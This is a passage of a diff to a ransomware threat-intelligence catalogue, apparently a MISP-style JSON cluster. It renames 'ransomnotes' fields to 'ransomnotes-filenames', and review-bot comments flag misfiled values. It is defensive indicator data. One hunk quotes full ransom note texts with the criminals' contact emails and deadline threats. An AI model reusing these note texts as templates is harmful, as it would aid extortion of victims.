], "payment-method": "Bitcoin", "price": "0.1 (45$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_THIS_TO_DECRYPT.html" ], "refs": [ @@ -5894,7 +6052,7 @@ "encryption": "AES + RSA", "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "OKSOWATHAPPENDTOYOURFILES.TXT" ], "refs": [ @@ -5920,7 +6078,7 @@ "meta": { "payment-method": "Bitcoin", "price": "0.9 (500$) - 1.9 (1000$) after 4 days", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_DECRYPT.TXT", "HOW_DECRYPT.HTML", "HOW_DECRYPT.URL" @@ -5968,7 +6126,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ IF YOU WANT YOUR FILES BACK.html" ], "refs": [ @@ -6007,7 +6165,7 @@ "extensions": [ ".clf" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "wallpaper.jpg" ] }, 
@@ -6051,7 +6209,7 @@ ], "payment-method": "Bitcoin", "price": "100€", - "ransomnotes": [ + "ransomnotes-filenames": [ "README!!!.txt", "GetYouFiles.txt", "crjoker.html" @@ -6150,10 +6308,6 @@ "ransomnotes": [ "HELP_YOUR_FILES.html (CryptXXX)", "HELP_YOUR_FILES.txt (CryptoWall 3.0, 4.0)", - "INSTRUCTION RESTORE FILE.TXT", - "# HELP_DECRYPT_YOUR_FILES #.TXT", - "_HELP_INSTRUCTION.TXT", - "C:\\ProgramData\\[random].exe", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nempty01@techmail.info\n\nempty02@yahooweb.co\n\nempty003@protonmail.com\n\nWe will help You as soon as possible!\n\nDECRYPT-ID-[id] number", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\ny0000@tuta.io\n\ny0000@protonmail.com\n\ny0000z@yandex.com\n\ny0000s@yandex.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nDECRYPT-ID-[id]", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nxzzx@tuta.io\n\nxzzx1@protonmail.com\n\nxzzx10@yandex.com\n\nxzzx101@yandex.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nDECRYPT-ID-[id] number", 
@@ -6162,9 +6316,17 @@ "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nsystemwall@keemail.me\n\nsystemwall@protonmail.com\n\nsystemwall@yandex.com\n\nsystemwall1@yandex.com\n\nemily.w@dr.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! IT MAY DAMAGE YOUR DATA FOREVER!\n\nDECRYPT-ID-%s number", "!!!All your files are encrypted!!!\nWhat to decipher write on mail alpha2018a@aol.com\nDo not move or delete files!!!!\n---- Your ID: 5338f74a-3c20-4ac0-9deb-f3a91818cea7 ----\n!!! You have 3 days otherwise you will lose all your data.!!!", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nbackuppc@tuta.io\n\nbackuppc@protonmail.com\n\nbackuppc1@protonmail.com\n\nb4ckuppc1@yandex.com\n\nb4ckuppc2@yandex.com\n\nbackuppc1@dr.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! IT MAY DAMAGE YOUR DATA FOREVER!\n\n\nDECRYPT-ID-[id] number", - "https://pbs.twimg.com/media/DuFQ4FdWoAMy7Hg.jpg", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nleab@tuta.io\n\nitprocessor@protonmail.com\n\npcambulance1@protonmail.com\n\nleablossom@yandex.com\n\nblossomlea@yandex.com\n\nleablossom@dr.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! 
IT MAY DAMAGE YOUR DATA FOREVER!\n\n\nDECRYPT-ID-[redacted lowercase GUID] number" ], + "ransomnotes-filenames": [ + "INSTRUCTION RESTORE FILE.TXT", + "# HELP_DECRYPT_YOUR_FILES #.TXT", + "_HELP_INSTRUCTION.TXT", + "C:\\ProgramData\\[random].exe" + ], + "ransomnotes-refs": [ + "https://pbs.twimg.com/media/DuFQ4FdWoAMy7Hg.jpg" + ], "refs": [ "http://www.nyxbone.com/malware/CryptoMix.html", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", @@ -6227,7 +6389,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 (360$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Where_are_my_files!.html" ], "refs": [ @@ -6244,7 +6406,7 @@ "extensions": [ ".doomed" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "LEER_INMEDIATAMENTE.txt" ], "refs": [ @@ -6263,7 +6425,7 @@ ], "payment-method": "Bitcoin", "price": "200$", - "ransomnotes": [ + "ransomnotes-filenames": [ "ATTENTION.url" ], "refs": [ @@ -6282,7 +6444,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 (100$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECRYPT FILES.txt", "%Temp%\\.bmp" ], @@ -6310,7 +6472,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_INSTRUCTION.HTM", "DECRYPT_INSTRUCTION.TXT", "DECRYPT_INSTRUCTION.URL", @@ -6325,7 +6487,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.TXT", "HELP_DECRYPT.PNG", "HELP_DECRYPT.URL", @@ -6340,7 +6502,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.TXT", "HELP_DECRYPT.PNG", "HELP_DECRYPT.URL", @@ -6362,7 +6524,7 @@ ], "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_YOUR_FILES.HTML", "HELP_YOUR_FILES.PNG" ] 
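Review bot: `"C:\\ProgramData\\[random].exe"` is placed under the new `ransomnotes-filenames` key at `@@ -6162`, but it is the location of a dropped executable, not the file name of a ransom note, and the new key name now asserts the latter to every consumer of this cluster. It was already a misfit in the old mixed `ransomnotes` list; since this split is what makes the field's meaning explicit, this is the moment to move it out — into the entry's `description`, or whatever field the cluster schema provides for dropped-file paths, which this diff does not show. The other three values in that block (`INSTRUCTION RESTORE FILE.TXT`, `# HELP_DECRYPT_YOUR_FILES #.TXT`, `_HELP_INSTRUCTION.TXT`) are correctly placed.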
@@ -6378,7 +6540,7 @@ ], "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", - "ransomnotes": [ + "ransomnotes-filenames": [ "de_crypt_readme.bmp, .txt, .html" ], "refs": [ @@ -6410,7 +6572,7 @@ ], "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", - "ransomnotes": [ + "ransomnotes-filenames": [ ".txt, .html, .bmp" ], "refs": [ @@ -6486,7 +6648,7 @@ ".cry" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_FOR_DECRYPT.txt" ], "refs": [ @@ -6507,7 +6669,7 @@ ], "payment-method": "Bitcoin", "price": "0.08686 (50$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "AllFilesAreLocked .bmp", "DecryptAllFiles .txt", ".html" @@ -6547,9 +6709,11 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "你的檔案被我們加密啦!!!.txt", "Your files encrypted by our friends !!! txt" ], + "ransomnotes-filenames": [ + "你的檔案被我們加密啦!!!.txt" + ], "refs": [ "https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool", "https://github.com/aaaddress1/my-Little-Ransomware" @@ -6595,7 +6759,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -6644,7 +6808,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_YOUR_FILES.txt" ], "refs": [ @@ -6702,7 +6866,7 @@ "encryption": "AES-256 in ECB mode, Version 2-4 also RSA", "payment-method": "Bitcoin", "price": "1 - 2 - 4", - "ransomnotes": [ + "ransomnotes-filenames": [ "cryptinfo.txt", "decrypting.txt", "start.txt" @@ -6755,7 +6919,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_TO_RECURE_YOUR_FILES.txt" ], "refs": [ @@ -6777,7 +6941,7 @@ ], "payment-method": "Email", "price": "250$", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECODE FILES!!!.txt", "КАК РАСШИФРОВАТЬ ФАЙЛЫ!!!.txt" ], 
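Review bot: `"Your files encrypted by our friends !!! txt"` is left in the free-text `ransomnotes` list at `@@ -6547` while its Chinese counterpart `你的檔案被我們加密啦!!!.txt` moves to `ransomnotes-filenames`; it reads as the same note's English file name with the dot before `txt` lost, so it presumably belongs in `ransomnotes-filenames` as `"Your files encrypted by our friends !!!.txt"` (verify against the linked repository). The same split leaves other file-name-shaped values in `ransomnotes`: `RESTORE-FILES![id]` at `@@ -7053`, `YOUR_FILES_ARE_ENCRYPTED.TXT ` (trailing space, which is likely why it was not picked up) at `@@ -8379`, `IMPORTANT.README` at `@@ -8435`, `DesktopOSIRIS.(bmp|htm)` and `lukitus.bmp.` moved there by `@@ -8140`/`@@ -8147`, and `.*id*` at `@@ -9038`, even though comparable patterns such as `OSIRIS-[0-9]{4}.htm` and `!_HOW_TO_RESTORE_*id*.txt` go to `ransomnotes-filenames`. Consumers matching observed artefacts against `ransomnotes-filenames` will miss these; moving them and trimming the trailing space keeps the two fields consistent.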
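Review bot: `"de_crypt_readme.bmp, .txt, .html"` at `@@ -6378` and `".txt, .html, .bmp"` at `@@ -6410` are single strings each holding several file names, and the rename to `ransomnotes-filenames` now declares the field to be a list of file names, so each element should be exactly one; `"UNLOCK_FILES_INSTRUCTIONS.html and .txt"` at `@@ -7303` has the same problem. For the first, the basename is presumably shared, giving `"de_crypt_readme.bmp", "de_crypt_readme.txt", "de_crypt_readme.html"`; for the second the basename is not recorded anywhere visible, so it needs to be recovered from the entry's refs before it can be split.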
@@ -6809,7 +6973,7 @@ ".dxxd" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.TxT" ], "refs": [ @@ -6866,7 +7030,7 @@ ".locked" ], "payment-method": "Download Decryter", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.txt" ], "refs": [ @@ -6905,7 +7069,7 @@ ], "payment-method": "Email", "price": "450$ - 1000$", - "ransomnotes": [ + "ransomnotes-filenames": [ "qwer.html", "qwer2.html", "locked.bmp" @@ -6923,7 +7087,7 @@ { "description": "Ransomware Coded in GO", "meta": { - "ransomnotes": [ + "ransomnotes-filenames": [ "Instructions.html" ], "refs": [ @@ -6954,7 +7118,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to recover.enc" ], "refs": [ @@ -6973,7 +7137,7 @@ ".1txt" ], "payment-method": "WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "enigma.hta", "enigma_encr.txt", "enigma_info.txt" @@ -7017,7 +7181,7 @@ ], "payment-method": "Bitcoin", "price": "1.50520802", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ ME FOR DECRYPT.txt" ], "refs": [ @@ -7053,9 +7217,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "DECRYPT_YOUR_FILES.HTML", "RESTORE-FILES![id]" ], + "ransomnotes-filenames": [ + "DECRYPT_YOUR_FILES.HTML" + ], "refs": [ "http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/" ], @@ -7073,7 +7239,7 @@ ".FenixIloveyou!!" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "Help to decrypt.txt" ], "refs": [ @@ -7122,7 +7288,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-filenames": [ "[random_chars]-READ_ME.html" ], "refs": [ @@ -7162,7 +7328,7 @@ "description": "Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents", "meta": { "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "help-file-decrypt.enc", "/pronk.txt" ] 
@@ -7216,7 +7382,7 @@ ".dll" ], "payment-method": "No Ransom - No Descrypter", - "ransomnotes": [ + "ransomnotes-filenames": [ "fs0ciety.html", "DECRYPT_YOUR_FILES.HTML" ], @@ -7278,7 +7444,7 @@ ], "payment-method": "Bitcoin", "price": "250$", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to restore files.hta" ], "refs": [ @@ -7303,7 +7469,7 @@ ], "payment-method": "Bitcoin", "price": "0.5(190 - 250 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "UNLOCK_FILES_INSTRUCTIONS.html and .txt" ], "refs": [ @@ -7351,7 +7517,7 @@ "meta": { "payment-method": "Bitcoin", "price": "500 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Your files have been crypted.html" ], "refs": [ @@ -7462,7 +7628,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "help_dcfile.txt" ], "refs": [ @@ -7577,7 +7743,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_DECRYPT_HYRDA_ID_[ID number].txt" ], "refs": [ @@ -7623,7 +7789,7 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "%Temp%\\.bmp" ], "refs": [ @@ -7657,7 +7823,7 @@ ], "payment-method": "Bitcoin", "price": "50 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Important_Read_Me.html" ], "refs": [ @@ -7673,7 +7839,7 @@ "encryption": "RC6 (files), RSA 2048 (RC6 key)", "payment-method": "Bitcoin", "price": "0.046627", - "ransomnotes": [ + "ransomnotes-filenames": [ "readme_liesmich_encryptor_raas.txt" ], "refs": [ @@ -7763,7 +7929,7 @@ ], "payment-method": "PaySafeCard", "price": "300 €", - "ransomnotes": [ + "ransomnotes-filenames": [ "Comment débloquer mes fichiers.txt", "Readme.txt" ], @@ -7793,7 +7959,7 @@ "meta": { "payment-method": "rubles", "price": "6 000", - "ransomnotes": [ + "ransomnotes-filenames": [ "How Decrypt Files.txt" ], "refs": [ 
@@ -7838,7 +8004,7 @@ "keybtc@inbox_com" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_YOUR_FILES.txt", "READ.txt", "readme.txt" @@ -7855,7 +8021,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.5 (500 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "how_decrypt.gif", "how_decrypt.html" ], @@ -7910,7 +8076,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.txt" ], "refs": [ @@ -7930,7 +8096,7 @@ ".([0-9A-Z]{20})_([0-9]{2})_([A-Z0-9]{4,5})" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "w.jpg" ], "refs": [ @@ -7953,7 +8119,7 @@ ], "payment-method": "Bitcoin", "price": "0.03", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_ALL.html" ], "refs": [ @@ -7969,7 +8135,7 @@ "meta": { "encryption": "AES-256", "payment-method": "ransom", - "ransomnotes": [ + "ransomnotes-filenames": [ "KryptoLocker_README.txt" ], "refs": [ @@ -8002,7 +8168,7 @@ ".LeChiffre" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt LeChiffre files.html" ], "refs": [ @@ -8022,7 +8188,7 @@ ], "payment-method": "Monero", "price": "50 - 500", - "ransomnotes": [ + "ransomnotes-filenames": [ "RANSOM_NOTE.txt" ], "refs": [ @@ -8071,7 +8237,7 @@ ], "payment-method": "Bitcoin", "price": "0.2 (200 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "LEAME.txt" ], "refs": [ @@ -8103,7 +8269,7 @@ ".locklock" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME.TXT" ], "refs": [ @@ -8140,6 +8306,10 @@ "payment-method": "Bitcoin", "price": "3 - 5 - 7", "ransomnotes": [ + "DesktopOSIRIS.(bmp|htm)", + "lukitus.bmp." + ], + "ransomnotes-filenames": [ "_Locky_recover_instructions.txt", "_Locky_recover_instructions.bmp", "_HELP_instructions.txt", 
@@ -8147,10 +8317,8 @@ "_HOWDO_text.html", "_WHAT_is.html", "_INSTRUCTION.html", - "DesktopOSIRIS.(bmp|htm)", "OSIRIS-[0-9]{4}.htm", - "lukitus.htm", - "lukitus.bmp." + "lukitus.htm" ], "refs": [ "http://www.bleepingcomputer.com/news/security/new-locky-version-adds-the-zepto-extension-to-encrypted-files/", @@ -8247,7 +8415,7 @@ ], "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_ReadMe1.TXT", "DECRYPT_ReadMe.TXT" ], @@ -8267,7 +8435,7 @@ ], "payment-method": "Bitcoin", "price": "1.4 - 3.9", - "ransomnotes": [ + "ransomnotes-filenames": [ "_DECRYPT_INFO_[extension pattern].html" ], "refs": [ @@ -8287,7 +8455,7 @@ ], "payment-method": "Bitcoin", "price": "0.7 - 1.1", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!! Readme For Decrypt !!!.txt", "ReadMeFilesDecrypt!!!.txt" ], @@ -8316,7 +8484,7 @@ "description": "Ransomware", "meta": { "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "where_are_your_files.txt", "readme_your_files_have_been_encrypted.txt" ], @@ -8360,7 +8528,7 @@ ".fuck" ], "payment-method": "Bitcoin - Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -8379,9 +8547,11 @@ "payment-method": "Bitcoin", "price": "1.9338", "ransomnotes": [ - "YOUR_FILES_ARE_ENCRYPTED.HTML", "YOUR_FILES_ARE_ENCRYPTED.TXT " ], + "ransomnotes-filenames": [ + "YOUR_FILES_ARE_ENCRYPTED.HTML" + ], "refs": [ "http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/", "https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html" @@ -8402,7 +8572,7 @@ ], "payment-method": "Bitcoin", "price": "1.011 (400 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ 
@@ -8435,9 +8605,11 @@
 "payment-method": "Bitcoin",
 "price": "4",
 "ransomnotes": [
- "4-14-2016-INFECTION.TXT",
 "IMPORTANT.README"
 ],
+ "ransomnotes-filenames": [
+ "4-14-2016-INFECTION.TXT"
+ ],
 "refs": [
 "http://nyxbone.com/malware/Mobef.html",
 "http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/",
@@ -8494,7 +8666,7 @@
 "meta": {
 "payment-method": "Bitcoin",
 "price": "1.5",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "decrypt explanations.html"
 ],
 "refs": [
@@ -8512,7 +8684,7 @@
 "encryption": "AES-256 + RSA",
 "payment-method": "Bitcoin",
 "price": "0.1 (43 $)",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "ATTENTION.RTF"
 ],
 "refs": [
@@ -8541,7 +8713,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.39983 - 4",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "Decrypted.txt"
 ],
 "refs": [
@@ -8579,7 +8751,7 @@
 "meta": {
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "!_RECOVERY_HELP_!.txt",
 "HELP_ME_PLEASE.txt"
 ],
@@ -8601,7 +8773,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5 - 1.5",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "Recupere seus arquivos. Leia-me!.txt"
 ],
 "refs": [
@@ -8639,7 +8811,7 @@
 ".nuclear55"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "!!_RECOVERY_instructions_!!.html",
 "!!_RECOVERY_instructions_!!.txt"
 ],
@@ -8677,7 +8849,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "HOW_TO_RESTORE_FILES.txt"
 ],
 "refs": [
@@ -8699,7 +8871,7 @@
 "email-[params].cbf"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "desk.bmp",
 "desk.jpg"
 ],
@@ -8740,7 +8912,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "100 $",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "how to get data.txt"
 ],
 "synonyms": [
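Review bot: In the Mobef hunk (`@@ -8435`) `"IMPORTANT.README"` is left under `ransomnotes` while `"4-14-2016-INFECTION.TXT"` moves to `ransomnotes-filenames`; `IMPORTANT.README` reads as a filename rather than a note body, so the split looks inverted for that value. If it is a filename, both names belong in `ransomnotes-filenames` and the `ransomnotes` array can go; the nyxbone.com reference kept in the same hunk should settle which it is. The remaining hunks on this line are plain key renames.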
@@ -8783,7 +8955,7 @@ ], "payment-method": "Bitcoin", "price": "0.29499335", - "ransomnotes": [ + "ransomnotes-filenames": [ "log.txt" ], "refs": [ @@ -8814,7 +8986,7 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ + "ransomnotes-filenames": [ "IMPORTANT READ ME.txt", "File Decrypt Help.html" ], @@ -8855,7 +9027,7 @@ ], "payment-method": "Bitcoin", "price": "0.25", - "ransomnotes": [ + "ransomnotes-filenames": [ "README!.txt" ], "refs": [ @@ -8887,7 +9059,7 @@ "meta": { "encryption": "Modified Salsa20", "payment-method": "Bitcoin - Website (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_ENCRYPTED.TXT" ], "refs": [ @@ -9022,7 +9194,7 @@ "meta": { "encryption": "AES", "payment-method": "Website (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_INSTRUCTION.html" ] }, @@ -9038,10 +9210,12 @@ "payment-method": "Bitcoin", "price": "3 (1 800 $)", "ransomnotes": [ + ".*id*" + ], + "ransomnotes-filenames": [ "!_HOW_TO_RESTORE_[extension].TXT", "!_HOW_TO_RESTORE_[extension].html", "!_HOW_TO_RESTORE_*id*.txt", - ".*id*", "@_USE_TO_FIX_JJnY.txt" ], "refs": [ @@ -9082,7 +9256,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "Ransomware.txt" ], "refs": [ @@ -9101,7 +9275,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPTION INSTRUCTIONS.txt", "rtext.txt" ], @@ -9121,7 +9295,7 @@ ], "payment-method": "Bitcoin", "price": "0.39 (215 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!!README!!![id].rtf" ], "refs": [ @@ -9160,7 +9334,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES.url" ], "refs": [ @@ -9212,7 +9386,7 @@ "!@#$%___________%$#@.mail" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "\\fud.bmp", "\\paycrypt.bmp", "\\strongcrypt.bmp", 
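Review bot: In the `@@ -9038` hunk the value `".*id*"` becomes the only entry of `ransomnotes`, but it is a wildcard pattern, not a note body; it matches the style of `"!_HOW_TO_RESTORE_*id*.txt"`, which the same hunk places in `ransomnotes-filenames`. If it is a filename glob it belongs in `ransomnotes-filenames`; if it was meant as an encrypted-file extension pattern it belongs in `extensions`; either way a consumer rendering `ransomnotes` as text will display a bare glob. Suggest moving it and dropping the empty `ransomnotes` array.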
@@ -9286,7 +9460,9 @@ "VictemKey_300_700", "VictemKey_700_2000", "VictemKey_2000_3000", - "VictemKey_3000", + "VictemKey_3000" + ], + "ransomnotes-filenames": [ "zXz.html" ], "refs": [ @@ -9350,7 +9526,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1 - 50", - "ransomnotes": [ + "ransomnotes-filenames": [ "RarVault.htm" ], "refs": [ @@ -9404,7 +9580,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Readme.txt" ], "refs": [ @@ -9445,7 +9621,7 @@ ], "payment-method": "Bitcoin", "price": "0.2403 (100.29 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_HOW_TO_UNLOCK.TXT", "README_HOW_TO_UNLOCK.HTML" ], @@ -9563,7 +9739,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT_YOUR_FILES.html", "###-READ-FOR-HELLPP.html", "000-PLEASE-READ-WE-HELP.html", @@ -9627,7 +9803,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_YOUR_FILES.HTML" ], "refs": [ @@ -9646,7 +9822,7 @@ ], "payment-method": "Bitcoin", "price": "6", - "ransomnotes": [ + "ransomnotes-filenames": [ "RESTORE_ALL_DATA.html" ], "refs": [ @@ -9680,7 +9856,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "!satana!.txt" ], "refs": [ @@ -9743,7 +9919,7 @@ ], "payment-method": "Bitcoin", "price": "50 - 100 - 200 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Readme.txt" ], "refs": [ @@ -9787,7 +9963,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "文件解密帮助.txt" ], "refs": [ @@ -9820,7 +9996,7 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ + "ransomnotes-filenames": [ "_RECOVER_INSTRUCTIONS.ini" ], "refs": [ @@ -9840,7 +10016,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ 
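Review bot: In the `@@ -9286` hunk the `VictemKey_300_700` … `VictemKey_3000` values remain in `ransomnotes` while only `"zXz.html"` is classified as a filename. Those tokens do not read as note bodies — they look like file or key-file names — so they presumably belong in `ransomnotes-filenames` as well, or in a dedicated field; worth confirming against the entry's refs before the text/filename split is relied on downstream. The rest of this line's hunks are straight key renames and raise nothing.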
@@ -9874,7 +10050,7 @@ ], "payment-method": "Bitcoin", "price": "0.66 (300 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "_HOW_TO_Decrypt.bmp" ], "refs": [ @@ -9894,7 +10070,7 @@ ], "payment-method": "Bitcoin", "price": "0.66 (300 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_Me.txt" ], "refs": [ @@ -9981,7 +10157,7 @@ "description": "Ransomware Still in development, shows FileIce survey", "meta": { "payment-method": "no ransom", - "ransomnotes": [ + "ransomnotes-filenames": [ "ThxForYurTyme.txt" ], "refs": [ @@ -10023,7 +10199,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Como descriptografar os seus arquivos.txt" ], "refs": [ @@ -10047,7 +10223,7 @@ ".xyz" ], "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_TO_SAVE_FILES.txt", "Howto_RESTORE_FILES.html" ], @@ -10087,7 +10263,7 @@ "meta": { "encryption": "AES-256 + ECHD + SHA1", "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "RECOVER<5_chars>.html", "RECOVER<5_chars>.png", "RECOVER<5_chars>.txt", @@ -10120,7 +10296,7 @@ "description": "Ransomware", "meta": { "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "RECOVER<5_chars>.html", "RECOVER<5_chars>.png", "RECOVER<5_chars>.txt", @@ -10154,7 +10330,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.25", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.HTML" ] }, @@ -10171,7 +10347,7 @@ ], "payment-method": "Bitcoin", "price": "4.081", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_RESTORE_FILES.html", "DECRYPT_INSTRUCTIONS.html", "DESIFROVANI_POKYNY.html", @@ -10226,7 +10402,7 @@ "meta": { "payment-method": "Bitcoin", "price": "100 - 150 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Payment_Instructions.jpg" ], "refs": [ @@ -10245,7 +10421,7 @@ ], "payment-method": "Bitcoin", "price": "0.23", - "ransomnotes": [ + "ransomnotes-filenames": [ "tox.html" ], "refs": [ 
